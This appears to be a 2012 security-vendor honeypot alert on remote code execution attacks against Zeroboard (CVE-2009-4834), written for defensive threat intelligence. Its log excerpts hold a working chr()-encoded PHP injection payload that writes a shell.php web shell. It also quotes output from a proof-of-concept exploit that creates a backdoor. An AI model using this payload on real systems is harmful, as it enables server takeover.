[Honeypot Alert] Zeroboard now_connect() Remote Code Execution Attacks

Change theme to light

April 11, 2012 3 Minute Read by Ryan Barnett

Our web honeypots recently identified attacks for CVE-2009-4834 which is a vulnerability within Zeroboard:

123.140.193.150 - - [09/Apr/2012:20:11:19 +0900] "GET http://host_removed/admin/access_log/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 304
123.140.193.150 - - [09/Apr/2012:20:11:23 +0900] "GET http://host_removed/zboard.php?id=test/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 290
123.140.193.150 - - [09/Apr/2012:20:11:27 +0900] "GET http://host_removed/admin/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 293
123.140.193.150 - - [09/Apr/2012:20:28:41 +0900] "GET http://host_removed/admin/access_log/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 304
123.140.193.150 - - [09/Apr/2012:20:28:45 +0900] "GET http://host_removed/zboard.php?id=test/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 290
123.140.193.150 - - [09/Apr/2012:20:28:49 +0900] "GET http://host_removed/admin/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 293

The chr( injected code, attempts to execute the following commands:

./shell.php w+

Based on these payloads, the attacker appears to have used a tool similar to this proof of concept script from Exploit-DB:

/*

poc by kyoungchip,jang

email : SpeeDr00t1004@gmail.com

[*] the bug

- http://www.xpressengine.com/15955761

Application

- Zeroboard 4.1 pl7

Reference:

- http://www.nzeo.com

- Zeroboard preg_replace() vulnerability Remote nobody exploit by n0gada

[*] Target - My test server

$ ./zbexpl http://xxx.xxx.xxx/zboard/zboard.php?id=test

- Target : http://xxx.xxx.xxx/zboard/zboard.php?id=test

- Target : http://xxx.xxx.xxx/zboard/bbs/shell.php?cmd=ls

[+] xxx.xxx.xxx connecting ok!

[+] Exploiting zeroboard start - [+] Exploiting success!!

[*] Create Backdoor Start - [+] Create Backdoor success!!

[*] Confirmming your backdoor php script - http://192.168.179.6/zeroboard/zb41pl7/bbs/data/shell.php is generated!

[+] Exploiting success!!

- http://192.168.179.6/zeroboard/bbs/data/shell.php?cmd=ls [+] Execute the websehll script

*/

Stay Informed:

RESEARCH REPORT

Facebook Malvertising Epidemic – Unraveling a Persistent Threat: SYS01

RESEARCH REPORT

2024 Professional Services Threat Intelligence Brief

ABOUT LEVELBLUE

LevelBlue is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.

Latest Intelligence

Microsoft Issues Emergency Patch for Windows Server Update Services RCE Vulnerability CVE-2025-59287

SharpParty: Process Injection in C#

The Cat's Out of the Bag: A 'Meow Attack' Data Corruption Campaign Simulation via MAD-CAT

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo

Experiencing a security breach?

Experiencing a security breach?

[Honeypot Alert] Zeroboard now_connect() Remote Code Execution Attacks

ABOUT LEVELBLUE

Latest Intelligence

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Stay Informed

Sign up to receive the latest security news and trends straight to your inbox from LevelBlue.

Experiencing a security breach?

Experiencing a security breach?

[Honeypot Alert] Zeroboard now_connect() Remote Code Execution Attacks

ABOUT LEVELBLUE

Latest Intelligence

Related Offerings

Discover how our specialists can tailor a security program to fit the needs of your organization.

Stay Informed

Sign up to receive the latest security news and trends straight to your inbox from LevelBlue.

Discover how our specialists can tailor a security program to fit the needs of
your organization.